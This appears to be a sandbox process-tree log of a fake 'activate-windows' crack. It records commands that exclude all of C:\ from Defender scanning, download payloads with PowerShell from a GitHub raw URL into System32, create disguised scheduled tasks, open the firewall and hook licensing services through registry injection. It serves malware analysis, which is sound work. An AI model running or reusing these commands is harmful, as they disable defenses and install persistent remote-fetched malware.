C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:32⤵PID:1984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2404 /prefetch:82⤵PID:232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:12⤵PID:3788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:4032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:82⤵PID:4564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4644,i,12248815736524452665,1474871372593401166,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:82⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1160
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4044
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\activate-windows\" -spe -an -ai#7zMap12930:94:7zEvent63941⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540
-
C:\Users\Admin\Downloads\activate-windows\MyPrograme.exe"C:\Users\Admin\Downloads\activate-windows\MyPrograme.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
PID:3492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\run_setup.bat"2⤵
- System Location Discovery: System Language Discovery
PID:2748 -
C:\Windows\SysWOW64\cmd.execmd /c "setup.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\setup.exesetup.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak6⤵
- Delays execution with timeout.exe
PID:1020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"5⤵
- Scheduled Task/Job: Scheduled Task
PID:876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:1668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/ZUMBAA' -OutFile 'C:\Windows\System32\vcruntime143_thread.dll'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:876
-
C:\Windows\system32\rundll32.exerundll32.exe vcruntime143_thread.dll,Start6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:4672 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"7⤵
- Scheduled Task/Job: Scheduled Task
PID:1940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat7⤵PID:4132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
-
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5252 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Help\service\wininitt.exe" "wininitt.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3700
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:1836 -
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:2436
-
-
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:992
-
-
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:4420
-
-
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:4784
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:4376
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2256
-
-
C:\Windows\system32\find.exefind /i "Full"3⤵PID:4304
-
-
C:\Windows\system32\reg.exereg query HKU\S-1-5-193⤵PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:4456 -
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:2436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:1668
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:4104
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4664
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:2792
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:4852
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:2180
-
-
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:4564
-
-
C:\Windows\system32\mode.commode con cols=80 lines=343⤵PID:4412
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4372
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:384
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:1668
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4356
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:5076
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4360
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:3716
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4728
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2180
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:2756
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2004
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:3368
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1712
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4456
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2436
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:4888
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1236
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:4936
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4852
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1900
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:4304
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:3988
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:312
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:112
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:3740
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2004
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:4132
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:2936
-
-
C:\Windows\system32\mode.commode con cols=100 lines=343⤵PID:1668
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5008
-
-
C:\Windows\system32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True3⤵PID:2888
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:388
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:1852
-
-
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:4360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:560
-
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4664
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:5108
-
-
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:4644
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\culypuzr\culypuzr.cmdline"4⤵PID:5204
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RES2083.tmp" "c:\Windows\Temp\culypuzr\CSCA81D62C3387A4CFB8E8112ED8A46FF4.TMP"5⤵PID:5288
-
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v Debugger3⤵PID:5380
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5412
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5424
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5440
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5456
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5472
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5488
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5500
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v Debugger3⤵PID:5548
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5580
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5596
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5656
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5676
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5688
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5700
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon"3⤵PID:5744
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5768
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':spptask\:.*'; [IO.File]::WriteAllText('SvcTrigger.xml',$f[1].Trim(),[System.Text.Encoding]::Unicode)"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5792
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger" /xml "C:\Windows\Temp\SvcTrigger.xml" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:5952
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:5980
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6024
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Software Protection Platform" /v NoGenTicket /t REG_DWORD /d 1 /f3⤵PID:5160
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:5148
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:5200
-
-
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:5224
-
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2760
-
-
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:1076
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1304
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3368
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3452
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3880
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:388
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k 2>nul | FIND /I "CurrentVersion"3⤵
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k4⤵PID:5036
-
-
C:\Windows\system32\find.exeFIND /I "CurrentVersion"4⤵PID:2812
-
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288" /v "CurrentState"3⤵PID:5296
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:5316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ECHO Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.12883⤵
- System Location Discovery: System Language Discovery
PID:4452
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.264" /v "CurrentState"3⤵PID:4284
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:1808
-
-
C:\Windows\system32\net.exenet start sppsvc /y3⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y4⤵PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4712 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value4⤵PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5348 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName4⤵PID:4360
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:4808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5188
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5392
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:5380
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\CVH /f Click2run /k3⤵
- Modifies registry key
PID:5396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5428 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5480 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5496
-
-
-
